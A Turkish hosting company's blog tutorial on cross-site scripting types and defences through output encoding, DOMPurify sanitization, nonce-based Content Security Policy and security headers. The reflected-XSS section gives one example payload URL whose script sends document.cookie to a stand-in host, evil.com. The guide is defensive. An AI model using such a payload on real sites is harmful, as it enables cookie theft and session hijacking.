Yazılım Geliştirme

Web uygulamaları, mobil, e-ticaret ve özel yazılım projeleri.

ReactNode.jsMobil

SEO & Optimizasyon

Organik trafik artışı, teknik SEO, içerik stratejisi ve analitik.

Teknik SEOİçerikAnalitik

API & Entegrasyon

REST API, webhook altyapıları, ödeme ve kargo entegrasyonları.

REST APIWebhookOAuth
Tüm hizmetleri görüntüle Ücretsiz danışmanlık alın

Web Hosting

cPanel yönetim paneli, SSD depolama, ücretsiz SSL sertifikası

Teklif Alın

VPS Sunucu

NVMe SSD, tam root erişim, DDoS koruması dahil

Teklif Alın
Popüler

Dedicated Sunucu

Tamamen size özel fiziksel sunucu, sınırsız trafik

Teklif Alın

Domain & SSL

Domain tescil, transfer ve Wildcard SSL sertifikaları

Teklif Alın

Neden KEYDAL?

  • 99.9% uptime garantisi
  • İstanbul veri merkezi
  • 7/24 Türkçe destek
  • Ücretsiz taşıma hizmeti
Fiyat teklifi alın

Projelerimiz

kSvSecurity, kAI, kMusic ve daha fazlası.

Hakkımızda

KEYDAL'ı tanıyın. Vizyonumuz, ekibimiz ve yolculuğumuz.

İletişim

Projenizi anlatın, size özel teklif sunalım.
Sözleşmeler
Gizlilik Politikası Kullanım Şartları SLA Sözleşmesi KVKK Aydınlatma Metni Çerez Politikası
01 Ana Sayfa
Yazılım Geliştirme SEO & Optimizasyon API & Entegrasyon
Web Hosting VPS Sunucu Dedicated Sunucu Domain & SSL
04 KEYDAL Projects 05 Araçlar 06 Blog
Hakkımızda İletişim Sözleşmeler
Teklif Alın
Blog / guvenlik

XSS Saldırıları ve Content Security Policy (CSP) ile Koruma

rehber 12 dk okuma 18 Nisan 2026
KEYDAL Kurucusu · Full-stack geliştirici Güncellendi: 25 Nisan 2026

Cross-site scripting (XSS), saldırganın kurban tarayıcısında kendi JavaScript''ini çalıştırdığı saldırı türüdür. Çerez çalma, oturum devralma, phishing — hepsi XSS ile mümkün. Koruma iki katmanlıdır: output encoding (kodu metin olarak göster) ve Content Security Policy (tarayıcı seviyesinde script engelle).

XSS Türleri

İlgili rehberler: SSL sertifikası nasıl alınır · OWASP Top 10 2026 · JWT güvenlik · SQL injection önleme · Parola hash (BCrypt, Argon2)

1) Reflected XSS

Kullanıcı input''u URL''den alınıp sayfaya echo''lanır, sanitize edilmez. Saldırgan hazırladığı linki kurbana gönderir.

<!-- Açık endpoint: /search?q=... -->
<h1>Arama sonucu: <%= req.query.q %></h1>

<!-- Saldırgan link: -->
https://site.com/search?q=<script>fetch('https://evil.com?c='+document.cookie)</script>

2) Stored XSS

Kötü niyetli script DB''ye kaydedilir, sonraki tüm ziyaretçiler saldırıya uğrar. En tehlikeli tür — forum yorumu, yorum, profil biyografisi gibi alanlarda yaygındır.

3) DOM-based XSS

Sunucu hiç karışmaz. JavaScript location.hash veya document.referrer gibi kaynakları alıp innerHTML ile DOM''a yazar. Saldırı tamamen tarayıcıda gerçekleşir, WAF yakalayamaz.

Temel Koruma: Output Encoding

Kullanıcı veriyi ekrana yazarken her zaman context''e uygun encode edin. HTML body, HTML attribute, JavaScript, URL, CSS — her biri farklı encoding ister.

// EJS template — varsayılan escape
<%= userInput %>       // GÜVENLI — < > & ' " escape edilir
<%- userInput %>       // TEHLİKELİ — ham HTML

// React — varsayılan escape
<div>{userInput}</div>          // GÜVENLI
<div dangerouslySetInnerHTML={{__html: userInput}} />  // TEHLİKELİ

// Manuel escape (raw string için)
function escapeHtml(s) {
    return s.replace(/[&<>"']/g, c => ({
        '&': '&amp;', '<': '&lt;', '>': '&gt;',
        '"': '&quot;', "'": '&#39;'
    })[c]);
}

Sanitization (HTML İçerik İçin)

Bazı alanlarda kullanıcının HTML yazmasına izin verilmesi gerekir (zengin metin editörü). O zaman whitelist bazlı sanitizer kullanın. Asla kendi regex''inizi yazmayın — DOMPurify (JS) ve bleach (Python) endüstri standardıdır.

// Client-side
import DOMPurify from 'dompurify';
const clean = DOMPurify.sanitize(dirty, {
    ALLOWED_TAGS: ['p','strong','em','a','ul','li','h2','h3'],
    ALLOWED_ATTR: ['href']
});

// Server-side (Node)
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');
const DOMPurify = createDOMPurify(new JSDOM('').window);
const clean = DOMPurify.sanitize(dirty);

Content Security Policy (CSP)

CSP, tarayıcıya "bu sayfada sadece şu kaynaklardan script/style/img yüklenebilir" diyen HTTP header''ıdır. Doğru yapılandırıldığında XSS saldırısı olsa bile script çalışmaz.

Content-Security-Policy:
    default-src 'self';
    script-src 'self' 'nonce-RANDOM' https://cdn.jsdelivr.net;
    style-src 'self' 'unsafe-inline' https://fonts.googleapis.com;
    img-src 'self' data: https://cdn.example.com;
    connect-src 'self';
    frame-ancestors 'self';
    base-uri 'self';
    object-src 'none';
    upgrade-insecure-requests;

Nonce ile Inline Script

Inline script''leri tamamen yasaklamak çoğu uygulamada pratik değildir. Nonce (number-used-once) ile her sayfa yüklemesinde random bir token üretip hem CSP header''a hem script tag''e ekleyin — CSP sadece o nonce''u taşıyan script''e izin verir.

// Express + Helmet
const crypto = require('crypto');
app.use((req, res, next) => {
    res.locals.cspNonce = crypto.randomBytes(16).toString('base64');
    next();
});

app.use(helmet({
    contentSecurityPolicy: {
        directives: {
            defaultSrc: ["'self'"],
            scriptSrc: ["'self'", (req, res) => `'nonce-${res.locals.cspNonce}'`]
        }
    }
}));
<!-- EJS template -->
<script nonce="<%= cspNonce %>">
    console.log('Bu çalışır — nonce var');
</script>
<script>
    console.log('Bu çalışmaz — nonce yok, CSP bloklar');
</script>

Ek Güvenlik Header''ları

X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy: camera=(), microphone=(), geolocation=()
Cookie: HttpOnly; Secure; SameSite=Strict
Uyarı
HttpOnly cookie''de oturum ID''niz XSS ile çalınamaz (JavaScript okuyamaz). Her sensitive cookie için zorunlu.

CSP Rapor Toplama

İlk CSP''yi prodüksiyona koymadan önce Content-Security-Policy-Report-Only modu kullanın — tarayıcı ihlali bildirir ama bloklamaz. Logları analiz edip policy''yi kalibre edin.

Web Güvenliği ve Uygulama Savunması

Modern web güvenliği katmanlı savunma (defense-in-depth) ile yapılır: TLS 1.3 ve HSTS ile şifreli iletişim, WAF (Web Application Firewall) ile OWASP Top 10 saldırılarına karşı koruma, BCrypt veya Argon2id ile parola hash'leme, JWT token'larında imza doğrulama (HMAC veya RSA), CSRF token + SameSite cookie ile cross-site istek koruması ve Content Security Policy ile XSS azaltma. SQL injection önleme için prepared statement, brute force için fail2ban veya rate limiting, DDoS koruması için Cloudflare/Anti-DDoS sağlayıcı zorunludur. Güvenlik açığı taraması (Burp Suite, OWASP ZAP) ve düzenli güvenlik denetimi; üretim ortamında veri sızıntısı ve hesap ele geçirme risklerini büyük ölçüde azaltır.

Uygulamanıza CSP kuralım

XSS denetimi, CSP tasarımı ve security header optimizasyonu için bize yazın

Yazan:

KEYDAL kurucusu ve baş geliştirici. 2026'dan bu yana hosting, yazılım geliştirme ve SEO alanlarında kurumsal müşterilere hizmet veriyor.

İlgili Yazılar

Bu yazıyı okuyanlar bunları da okudu

guvenlik 27 dk

Link Kontrol Etme Rehberi 2026: Güvenli Site, URL Sorgulama ve Phishing Tespiti

Bir bağlantının güvenli olup olmadığını anlamanın 2026 rehberi: URL ayrıştırma, HTTPS/SSL kontrolü, WHOIS yaşı, Google Safe Browsing, VirusTotal, urlscan.io, sandbox tarama ve phishing göstergeleri.
guvenlik 22 dk

SSL Sertifikası Nasıl ve Nereden Alınır? Ücretsiz ve Ücretli Seçenekler

SSL/TLS sertifikası nasıl alınır, nereden alınır? Let's Encrypt, ZeroSSL, Sectigo ve DigiCert karşılaştırması. Certbot, acme.sh, cPanel ve Plesk ile kurulum, CSR üretimi, Nginx TLS 1.3 yapılandırma ve A+ güvenlik.
guvenlik 11 dk

Password Hashing: bcrypt, argon2id ve scrypt Karşılaştırması

Modern parola hashing — bcrypt, argon2id, scrypt karşılaştırması, salt, pepper, work factor ayarı ve Node.js / Python uygulamaları.
WhatsApp